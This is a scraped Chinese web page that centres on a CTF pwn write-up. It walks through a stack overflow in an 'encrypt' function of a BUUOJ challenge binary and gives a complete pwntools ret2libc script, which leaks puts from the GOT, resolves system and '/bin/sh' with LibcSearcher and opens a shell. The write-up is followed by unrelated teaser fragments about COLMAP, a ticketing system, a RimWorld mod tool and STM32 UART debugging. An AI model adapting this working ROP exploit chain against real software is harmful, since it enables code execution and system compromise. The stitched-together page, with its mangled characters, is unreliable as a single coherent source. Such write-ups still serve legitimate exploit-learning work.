好的网站制作注册了域名怎么做网站

张小明 2026/1/17 18:05:31
好的网站制作,注册了域名怎么做网站,贸易网站源码,大学生创业计划书首先checksec检查保护机制#xff1a;-64位程序-开启了栈不可执行保护接下来使用IDA反汇编工具进行分析#xff1a;发现begin函数#xff0c;点进去begin函数内部#xff1a;输入1可用进入encrypt函数#xff0c;输入2可从主函数看到并没有什么用#xff0c;3是退出程序这…首先checksec检查保护机制-64位程序-开启了栈不可执行保护接下来使用IDA反汇编工具进行分析发现begin函数点进去begin函数内部输入1可用进入encrypt函数输入2可从主函数看到并没有什么用3是退出程序这是encrypt函数内部get函数可触发栈溢出漏洞看到这一行代码就可用了下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移0x500x8 0x58由于在IDA中没发现任何后门函数和system函数地址所以这里考虑泄露libc后来得到system函数和/bin/sh这里我们需要构造ROP链来调用函数所以还需用到ret和rdi的地址输入以下指令ROPgadget --binary pwn --only pop|retrdi地址0x400c83ret地址0x4006b9q其中rdi用于调用函数ret用于栈对齐再在IDA中拿到encrypt地址用于第一次泄露libc后再次进入encrypt函数0x4009A0基本信息拿到可用来写exp攻击脚本了from pwn import * from LibcSearcher import LibcSearcher context(archamd64, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,28902) # 与在线环境交互。 encrypt_addr 0x4009A0 offset 0x58 elf ELF(./pwn) puts_got elf.got[puts] puts_plt elf.plt[puts] rdi_addr 0x400c83 ret_addr 0x4006b9 io.recvuntil(bInput your choice!\n) io.sendline(b1) io.recvuntil(bInput your Plaintext to be encrypted\n) payload ba*offset p64(rdi_addr) p64(puts_got) p64(puts_plt) p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr u64(io.recvline().strip().ljust(8,b\x00)) print(hex(puts_addr)) libc LibcSearcher(puts,puts_addr) libc_base puts_addr - libc.dump(puts) system_addr libc_base libc.dump(system) bin_sh_addr libc_base libc.dump(str_bin_sh) io.recvuntil(bInput your Plaintext to be encrypted\n) payload ba*offset p64(ret_addr) p64(rdi_addr) p64(bin_sh_addr) p64(system_addr) io.sendline(payload) io.interactive()这是运行结果这里需要手动选择libc64位程序就选64位的libc可能会选到不适配的libc库多试几次就可用了拿到shell后手动输入cat flag拿到flag
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

建一个网站式系统南城微网站建设

COLMAP三维重建实战指南:从入门到精通的完整解决方案 【免费下载链接】colmap COLMAP - Structure-from-Motion and Multi-View Stereo 项目地址: https://gitcode.com/GitHub_Trending/co/colmap 还在为三维重建效果不佳而烦恼吗?COLMAP作为开源…

张小明 2026/1/10 16:57:07 网站建设

企业网站内容是什么wordpress自定义搜索功能

Ferry工单管理系统:从流程混乱到高效协作的智能化解决方案 【免费下载链接】ferry_web ferry ui展示。 项目地址: https://gitcode.com/gh_mirrors/fe/ferry_web 在日常企业运营中,你是否经常遇到这样的场景:IT支持请求在邮件中来回转…

张小明 2026/1/10 16:57:09 网站建设

网站开发主要用什么语言网站建设超链接制作

3步告别RimWorld模组管理烦恼:这款自动排序工具让游戏体验翻倍 【免费下载链接】RimSort 项目地址: https://gitcode.com/gh_mirrors/ri/RimSort 还在为RimWorld模组加载顺序头疼?每次添加新模组都担心游戏崩溃?RimWorld模组管理其实…

张小明 2026/1/10 11:41:29 网站建设

建筑外观设计网站织梦网站漏洞

从零开始:在STM32上用UART玩转printf调试你有没有过这样的经历?写了一段代码烧进STM32,结果板子“纹丝不动”——LED不闪、电机不转,连个报错都没有。这时候你只能靠猜:“是初始化没跑完?还是卡在某个while…

张小明 2026/1/10 7:28:33 网站建设

常用的网站流量统计软件有哪些网络站点推广的方法

第一章:医疗康复Agent的方案调整机制概述在智能医疗系统中,医疗康复Agent作为核心决策组件,负责根据患者实时健康数据动态调整治疗与康复方案。其调整机制依赖于多源数据融合、临床知识图谱推理以及个性化学习模型,确保推荐策略既…

张小明 2026/1/10 16:57:13 网站建设

沈阳网站建设推广平台用asp做网站怎么美观

Excalidraw集成AI后有多强?输入文字自动生成草图 在一次产品评审会上,团队正讨论一个新功能的交互流程。产品经理口头描述:“用户从首页点击按钮,跳转到授权页面,登录后生成临时凭证,再返回主应用。”传统做…

张小明 2026/1/10 16:57:12 网站建设